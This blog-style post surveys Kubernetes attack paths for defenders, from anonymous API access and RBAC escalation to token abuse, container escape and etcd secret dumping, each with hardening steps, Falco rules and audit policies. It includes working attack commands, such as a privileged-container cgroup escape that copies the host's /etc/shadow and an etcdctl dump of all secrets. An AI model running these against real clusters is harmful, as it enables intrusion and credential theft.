Kubernetes Attack Techniques in 2025: From Initial Access to Cluster Takeover
Overview
Kubernetes has become the default substrate for cloud-native workloads, and with that ubiquity comes attacker attention. In 2024 and 2025, Kubernetes-targeting campaigns have grown in both volume and sophistication — from opportunistic cryptomining via exposed API servers to targeted intrusions where K8s clusters serve as pivot points into broader cloud environments.
This post walks through the major attack paths observed in current campaigns and research, paired with detection logic and hardening guidance. The aim is not to provide a deployment guide for attackers, but to give security teams and platform engineers a realistic picture of where clusters are commonly compromised.
Attack Surface Overview
A Kubernetes cluster exposes several distinct attack surfaces:
- Kubernetes API server: The control plane endpoint — the most sensitive interface in the cluster
- Kubelet API: Per-node agent API, often accessible on port 10250
- etcd: The key-value store holding all cluster state, including secrets
- Container runtime: The interface through which containers can be escaped to the host
- Service account tokens: Credentials automatically mounted into pods
- Helm/GitOps pipelines: CI/CD paths that deploy workloads with cluster-wide privileges
Attackers who breach any of these surfaces can typically move to others — the interconnected trust relationships within a cluster mean that compromise of one component often enables pivot to higher privilege.
Technique 1: Exposed Kubernetes API Server
Discovery
The Kubernetes API server listens on port 6443 by default. Misconfigured clusters with --anonymous-auth=true and permissive RBAC bindings for the system:anonymous or system:unauthenticated groups allow unauthenticated enumeration and sometimes full cluster access.
Shodan and Censys regularly index thousands of exposed API servers. Attack tooling like kubeletctl and kubectl can enumerate these directly.
# Check if anonymous access is permitted
curl -sk https://<api-server>:6443/api/v1/namespaces
# If it returns namespace data without authentication,
# the cluster has anonymous access enabled with permissive RBAC
# List pods across all namespaces anonymously
kubectl --server=https://<api-server>:6443 \
--insecure-skip-tls-verify \
get pods --all-namespaces
Hardening
# kube-apiserver flags — disable anonymous auth
--anonymous-auth=false
# Audit RBAC bindings for anonymous/unauthenticated subjects
kubectl get clusterrolebindings -o json | \
jq '.items[] | select(.subjects[]?.name == "system:anonymous" or
.subjects[]?.name == "system:unauthenticated")'
Technique 2: RBAC Misconfiguration and Privilege Escalation
Overprivileged Service Accounts
Service accounts are frequently over-provisioned. Common misconfigurations include:
- Binding the
cluster-adminrole to application service accounts - Using
create/updatepermissions onrolebindingsorclusterrolebindings(allows self-escalation) - Granting
secretsget/listpermissions cluster-wide (exposes all secrets including other service account tokens) - Granting
pods/execorpods/attach(allows interactive shell in any pod)
Privilege Escalation via RBAC
If a service account can create RoleBindings, it can grant itself additional permissions:
# An attacker with 'create rolebindings' permission can escalate:
kubectl create rolebinding attacker-admin \
--clusterrole=cluster-admin \
--serviceaccount=default:compromised-sa \
--namespace=kube-system
Detection
# Audit for wildcard permissions (highest risk)
kubectl get clusterrolebindings,rolebindings --all-namespaces -o json | \
jq '.items[] | select(.roleRef.name == "cluster-admin") |
{name: .metadata.name, subjects: .subjects}'
# Find service accounts with secrets list/get permissions
kubectl auth can-i list secrets --as=system:serviceaccount:default:my-sa \
--all-namespaces
Technique 3: Service Account Token Abuse
Automatic Token Mounting
By default, Kubernetes mounts a service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. If an attacker achieves code execution inside a container — through a web application vulnerability, for example — they can read this token and use it to authenticate to the API server.
# From inside a compromised container:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Query the API server with the mounted token
curl --cacert $CACERT \
-H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/default/secrets
If the compromised pod's service account has broad permissions, this gives the attacker direct API access from inside the cluster.
Hardening
# Disable automatic token mounting for pods that don't need API access
apiVersion: v1
kind: ServiceAccount
metadata:
name: my-app-sa
automountServiceAccountToken: false
# Or at the pod level
spec:
automountServiceAccountToken: false
Technique 4: Container Escape Techniques
Privileged Container Escape
A container running with securityContext.privileged: true has effectively no isolation from the host. A simple escape using the /dev device tree:
# Inside a privileged container — escape to host filesystem
# Create a cgroup that triggers a host write on release
mkdir /tmp/cgroup_escape && mount -t cgroup -o memory cgroup /tmp/cgroup_escape
mkdir /tmp/cgroup_escape/x
echo 1 > /tmp/cgroup_escape/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgroup_escape/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgroup_escape/x/cgroup.procs"
# Result: /etc/shadow from the host is now accessible
This technique requires no CVE — it uses the intended behavior of privileged containers.
hostPath Mount Abuse
Mounting the host filesystem into a container via hostPath volumes gives read/write access to host files:
# Dangerous pod spec — mounts entire host filesystem
volumes:
- name: host-root
hostPath:
path: /
type: Directory
An attacker who can create pods with this spec can read host credentials, SSH keys, kubeconfig files, and cloud provider metadata endpoints.
CVE-2024-21626: runc Container Escape
In February 2024, CVE-2024-21626 was disclosed in runc, the low-level container runtime used by most Kubernetes distributions. A file descriptor leak in runc's process setup allowed a specially crafted container image to escape to the host filesystem by exploiting the leaked file descriptor pointing to the host's working directory.
The vulnerability required only the ability to run a container with a malicious image — no elevated privileges within the container were needed.
Mitigation: Update runc to 1.1.12 or later; update container runtime (containerd, CRI-O) to versions incorporating the fix.
Technique 5: etcd Access for Secret Extraction
etcd stores all Kubernetes cluster state in plaintext, including Secret objects. While secrets are base64-encoded in the Kubernetes API, they are stored in plaintext in etcd. Direct etcd access bypasses all RBAC controls.
etcd typically listens on port 2379 and 2380. If accessible without authentication (or with client certificate authentication where the attacker has obtained a valid client cert), all cluster secrets can be extracted:
# If etcd is accessible (2379) with client certs:
ETCDCTL_API=3 etcdctl \
--endpoints=https://<etcd-host>:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get /registry/secrets --prefix | strings
# This dumps all secrets from the cluster in readable form
Mitigation: Enable Encryption at Rest in Kubernetes (EncryptionConfiguration) so secrets are encrypted in etcd. Network-isolate etcd to be accessible only by the API server.
Detection Framework
Audit Logging
Enable Kubernetes audit logging — it is disabled by default. Audit logs capture every API server request and are essential for detecting malicious behavior post-compromise.
# Audit policy — log sensitive operations
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: RequestResponse
resources:
- group: ""
resources: ["secrets", "serviceaccounts/token"]
- level: Request
verbs: ["create", "delete", "patch"]
resources:
- group: "rbac.authorization.k8s.io"
resources: ["clusterrolebindings", "rolebindings"]
- level: Metadata
resources:
- group: ""
resources: ["pods/exec", "pods/attach"]
Runtime Detection with Falco
Falco is an open-source runtime security tool for Kubernetes that detects anomalous container behavior:
# Falco rule: detect shell spawned inside container
- rule: Terminal shell in container
desc: A shell was spawned in a container — possible interactive session
condition: >
spawned_process and container and
shell_procs and proc.tty != 0 and
not user_expected_terminal_shell_in_container_conditions
output: >
A shell was spawned in a container (user=%user.name container=%container.name
image=%container.image.repository shell=%proc.name parent=%proc.pname)
priority: WARNING
# Falco rule: detect read of service account token
- rule: Read service account token
desc: A process read the service account token file
condition: >
open_read and
fd.name startswith /run/secrets/kubernetes.io/serviceaccount and
not proc.name in (known_sa_readers)
output: >
Service account token read (proc=%proc.name pid=%proc.pid
container=%container.name)
priority: WARNING
Hardening Checklist
| Control | Implementation |
|---|---|
| Disable anonymous API access | --anonymous-auth=false on API server |
| Enable audit logging | Configure --audit-policy-file and --audit-log-path |
| Enforce Pod Security Standards | Use PodSecurity admission controller (Restricted profile) |
| Disable auto token mounting | automountServiceAccountToken: false on ServiceAccounts |
| Encrypt secrets at rest | Configure EncryptionConfiguration for etcd |
| Network-isolate etcd | Allow port 2379/2380 only from API server IPs |
| Enable RBAC | Ensure --authorization-mode=RBAC is set |
| Audit RBAC bindings regularly | Review cluster-admin bindings and wildcard permissions |
| Deploy runtime detection | Install Falco or equivalent on all nodes |
| Use network policies | Default-deny all ingress/egress; allow only required flows |
Conclusion
Kubernetes clusters are complex systems with multiple interacting trust boundaries. The attack paths described here — from anonymous API access to container escape — are not theoretical. They appear in real incident reports and red team assessments regularly.
The most impactful hardening investments are: disabling anonymous access, enforcing least-privilege RBAC, enabling audit logging, and deploying a runtime detection tool like Falco. Clusters that lack these fundamentals are not hardened against the attack patterns that active campaigns use today.
Security teams should also treat Kubernetes RBAC audits as a recurring operational task, not a one-time configuration step. Permissions accumulate over time as applications and teams evolve, and the gap between intended and actual privilege grows quietly until an attacker finds it first.